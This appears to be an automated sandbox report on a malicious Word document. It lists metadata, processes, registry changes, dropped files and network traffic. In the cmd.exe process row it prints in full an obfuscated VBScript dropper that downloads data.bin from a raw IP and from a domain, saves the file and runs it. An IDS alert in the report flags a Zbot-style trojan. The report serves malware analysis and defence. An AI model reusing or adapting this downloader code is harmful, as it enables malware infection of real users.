File name: | a55f7463e14155f62adba7b61917ba7d.doc |
Full analysis: | https://app.any.run/tasks/f0f1578a-59ab-4518-a271-1ff77a70e145 |
Verdict: | Malicious activity |
Analysis date: | April 23, 2019, 07:58:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: nonmonarchistic , Template: Normal.dotm, Last Saved By: adherescence , Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jun 3 22:27:00 2016, Last Saved Time/Date: Sun Aug 7 00:34:00 2016, Number of Pages: 1, Number of Words: 3251, Number of Characters: 18532, Security: 0 |
MD5: | A55F7463E14155F62ADBA7B61917BA7D |
SHA1: | 3E56FD1C41C3EB39235E8D697CF4F1934A4622A3 |
SHA256: | 3DD06F48B6505BB705BC0834C9F34CDEF80E778417F6BEC8850776F32334AD5D |
SSDEEP: | 1536:/wv2JTL76hKmy5Xyfvau1V8LHZiiy3SyZmfpbkZobObdBBdm+IGwAJuDTKtrCEWE:/JTLOcmy5Xya+g5iz3HmQoGwAJXdbIC |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 14 |
CharCountWithSpaces: | 21740 |
Paragraphs: | 43 |
Lines: | 154 |
Company: | glutael |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 18532 |
Words: | 3251 |
Pages: | 1 |
ModifyDate: | 2016:08:06 23:34:00 |
CreateDate: | 2016:06:03 21:27:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 4 |
LastModifiedBy: | adherescence |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | nonmonarchistic |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2808 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a55f7463e14155f62adba7b61917ba7d.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3668 | "C:\Windows\System32\cmd.exe" /V /C set "JlD=C:\Users\admin\AppData\Roaming\%RANDOM%.vbs" && (for %i in ("dIm C1HAUo" "SUb LR()" "FR=96" "CX3=""""" "Lp9c2=6" "PQQxQnb=C1HAUo & WEUk1W & DfS5vBG("630F091F","VMaN")" "YtHZ=3" "SQx2=DfS5vBG("575D3479304C557078161463041607601072757516","U40PW")" "B1=63" "EnAQ C1HAUo & DfS5vBG("6A7C0B13","ND2"),PQQxQnb" "Ff3ry=96" "iF NuYelnW="" THEn AFOtXLB((-451+455))" "I9M9=48" "KZJ6="LXKrwN"" "FdDAiUp=21" "sET Iha=cREAteObjEcT(DfS5vBG("0F181105273C2C65211F2B2034",KZJ6))" "OxJ=98" "Iha.RuN SQx2 & PQQxQnb & CX3,1729-1729,2183-2183" "QeB0=84" "eNd SUb" "functIoN Fney(M9T,XcuUXPQ)" "Aez=54" "Fney=(M9T aND Not XcuUXPQ)oR(NoT M9T aND XcuUXPQ)" "B5Yr=28" "enD FUnCtioN" "SUb MzY()" "EVc2=27" "YUqklR=94643265" "Dfi=68" "FoR Pg6n=1 tO YUqklR" "DkT3=DkT3+1" "neXt" "ELPI4=7" "If DkT3=YUqklR TheN" "YwDx9nw=40" "AFOtXLB((-2594+2598))" "G1R=63" "YaNI(DfS5vBG("2B47310755616C4324030E3E2F5C3011412D2C5E6A130E3A221D271E01","NC3Ewo"))" "R0Z3=25" "EnD iF" "VokkUN4=41" "ENd sUB" "FUnCtIon BRqXDc(A3)" "ClU8yZ=32" "BRqXDc=asC(A3)" "Ljzj5l=31" "eND FUncTIOn" "sUB YgEx()" "Q0=60" "Dim Lb7, FPUfcMW" "For Lb7 = 39 To 9000257" "FPUfcMW = JF1 + 37 + 98 + 89" "Next" "A5=93" "eNd SUb" "GPnCwjS=47" "MzY" "fuNCtIOn YaNI(AxeTEV)" "I3X=58" "diM JJ,CYkj" "Ez4mF=66" "SelpK0t="IhNAgA"" "RqcjoH=24" "On ERrOR ReSUME nExT" "V6oI=24" "ILIMb4="TsEdh"" "DzI=32" "sEt JJ=crEaTEoBjecT(DfS5vBG("2416071A3D03314A3B3C162908",ILIMb4))" "FHel=86" "KN="QJHa"" "YgEx" "DR=28" "Set LwmclJ=JJ.ENVIRoNMeNT(DfS5vBG("18023621021B03","GHPyb"))" "T5=60" "C1HAUo=LwmclJ(DfS5vBG("033D15062C1103","EBm"))&OZidzz((552920/6010))& WEUk1W & WEUk1W" "Bf7=48" "Yq9="F1"" "DXXqVR=18" "SEt CYkj=CREATeObjECT(DfS5vBG("7C2F52345E355E204568690B7D0E651261",Yq9))" "QOPuD=40" "CYkj.oPen DfS5vBG("027C00","TE9"),AxeTEV,5277-5277" "Q8fc=49" "CYkj.SENd()" "C54EY=95" "if CYkj.STATUs=(-8506+8706) then" "XzJ=32" "YgEx" "NF41Io6=59" "AFOtXLB((-1988+1992))" "KHWB=9" "FDIm CYkj.rEsPOnSEbODy" "KXGTN=26" "Else" "DKnSxxa=44" "W8="T8"" "BH=64" "sEt CYkj= crEaTEObJEcT(DfS5vBG("753D5B26572757324C7A6019741C6C0068",W8))" "Au3=63" "CYkj.OPEn DfS5vBG("712306","R6f"),DfS5vBG("06381B34546340765E7B41715962576A5C795E6B0A2D1B25402E062A","DnLo" ),2128-2128" "O4=20" "CYkj.senD()" "JF0co7f=40" "If CYkj.sTaTus=(668-468)TheN FDIm CYkj.ReSpONSeboDY" "SxTSpu=13" "B9OjwIG=74" "end if" "ORs=16" "ENd fUnCtION" "sUb FDIm(Cs)" "D9A=82" "diM Nkf1X" "Frhm=75" "C0U="YAwTF"" "VI=25" "sEt Nkf1X=CREAteOBJecT(DfS5vBG("00331B021B6F2420343C201A",C0U))" "YYcs=70" "Nkf1X.Open" "U2h2y=55" "Nkf1X.tYpE=953-952" "NA36=73" "Nkf1X.wRite Cs" "N0=70" "Nkf1X.saVeTofILe C1HAUo & DfS5vBG("632B283D","YMemj"),4439-4437" "TYiru2q=48" "Nkf1X.cLoSe" "PgC5ZRi=27" "LR" "OO=80" "eND SUb" "fuNCTIOn EnAQ(TkLu,DZbQgMr)" "SI=78" "dIm LAV45c,NM33XTg,IZm1YO,EfBP7q,FxlO(5)" "GtUmt0=79" "FxlO(2)=107" "DvCJ=93" "FxlO(3)=50" "SVkuoz2DR=98" "FxlO(0)=104" "Va2=93" "FxlO(1)=100" "B3FU=66" "FxlO(5)=52" "N4DKIeE=57" "FxlO(4)=54" "BQ5Eb=65" "Ok9b=61" "sET LAV45c=CreatEobjEcT(DfS5vBG("030113502035390C061716283C0732402335350F2E5B3A243316", "APba9P"))" "BF=63" "sEt NM33XTg=LAV45c.gEtfile(TkLu)" "CjkfxC=54" "Set EfBP7q=NM33XTg.OPENaStexTstreAm(4220-4219,5542-5542)" "BRAhEmL=34" "seT IZm1YO=LAV45c.cREateTEXTFIlE(DZbQgMr,482-481,1204-1204)" "GLD3=67" "dO UntiL EfBP7q.AteNdoFsTream" "IZm1YO.Write OZidzz(Fney(BRqXDc(EfBP7q.REAd(6397-6396)),FxlO(0)))" "looP" "RKL=55" "IZm1YO.cLOse" "ELgysl=72" "EfBP7q.cLOSE" "TaRQ=77" "enD fuNcTioN" "FUnCTiOn DfS5vBG(LF,Yk)" "QGEtQ=17" "dIM ErBOPn,DPjnS,NCnVL" "DlLdc=91" "FoR ErBOPn=1 To (LeN(LF)/2)" "DPjnS=(OZidzz((4269-4231)) & OZidzz((3235-3163))&(Mid(LF,(ErBOPn+ErBOPn)-1,2)))" "NCnVL=(BRqXDc(MId(Yk,((ErBOPn MOd lEN(Yk))+1),1)))" "DfS5vBG=DfS5vBG+OZidzz(Fney(DPjnS,NCnVL))" "neXt" "WuN=90" "EnD FuNCTiOn" "fuNctIon OZidzz(JbKBPb)" "UOYiHcw=54" "OZidzz=cHr(JbKBPb)" "PQP33CP=83" "ENd fuNctiON" "sUb AFOtXLB(GXC07)" "XkVatL5=15" "dIm N0PJ0b" "Y66X=22" "N0PJ0b=tiMeR+GXC07" "dO wHILe TiMer<N0PJ0b" "loOp" "XklNGL5=78" "eNd Sub" "fUNctIon WEUk1W()" "RI4dStW=19" "WEUk1W=SeCoNd(Time)" "KbIK=12" "EnD fuNctIon" "SUb Y6()" "EtE4E=76" "DIm DF0J7FC,LrvyWVb" "XEyK=80" "Do whiLe DF0J7FC<>283-282" "LrvyWVb=LrvyWVb+1" "looP" "EvkdKrO=87" "eNd SuB") do @echo %~i)>"!JlD!" && start "" "!JlD!" | C:\Windows\System32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2972 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\26535.vbs" | C:\Windows\System32\WScript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 |
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | yx= |
Value: 79783D00F80A0000010000000000000000000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1318518814 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1318518936 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1318518937 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: F80A0000A8386161AAF9D40100000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | cy= |
Value: 63793D00F80A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | cy= |
Value: 63793D00F80A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFC79.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2972 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pataplouf[1].txt | — | |
MD5:— | SHA256:— | |||
3668 | cmd.exe | C:\Users\admin\AppData\Roaming\26535.vbs | text | |
MD5:00211A9E8BCF7304A64E47754DBFE1AA | SHA256:D650924F34778AD6195A986F5082822848630D166EEE6B6963E326984F6F2D59 | |||
2972 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pataplouf[2].txt | text | |
MD5:32990E7F81F7AADCDA0A5BE5438A4E20 | SHA256:73700D1D02FD969F0E019D4016663B63A92C7F4E4B60952D357A1FC0B68F3B8F | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D51C39B4563387032CF4AD31ABBB804B | SHA256:8457B9288580533F5060CCDE479080E768ED8FC6C36263F6B10452EB894690E2 | |||
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$5f7463e14155f62adba7b61917ba7d.doc | pgc | |
MD5:4F4DC7AE3F57772C55329D824B56BA9C | SHA256:17613C421276BA3779D2EFAD6E8FBE110EC59D79C9C16BD23FF7D01BEB4B09BD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2972 | WScript.exe | GET | — | 207.57.8.251:80 | http://207.57.8.251/data.bin | US | — | — | suspicious |
2972 | WScript.exe | GET | 404 | 213.186.33.168:80 | http://pataplouf.com/data.bin | FR | html | 206 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2972 | WScript.exe | 213.186.33.168:80 | pataplouf.com | OVH SAS | FR | suspicious |
2972 | WScript.exe | 207.57.8.251:80 | — | NTT America, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
pataplouf.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2972 | WScript.exe | A Network Trojan was detected | ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin |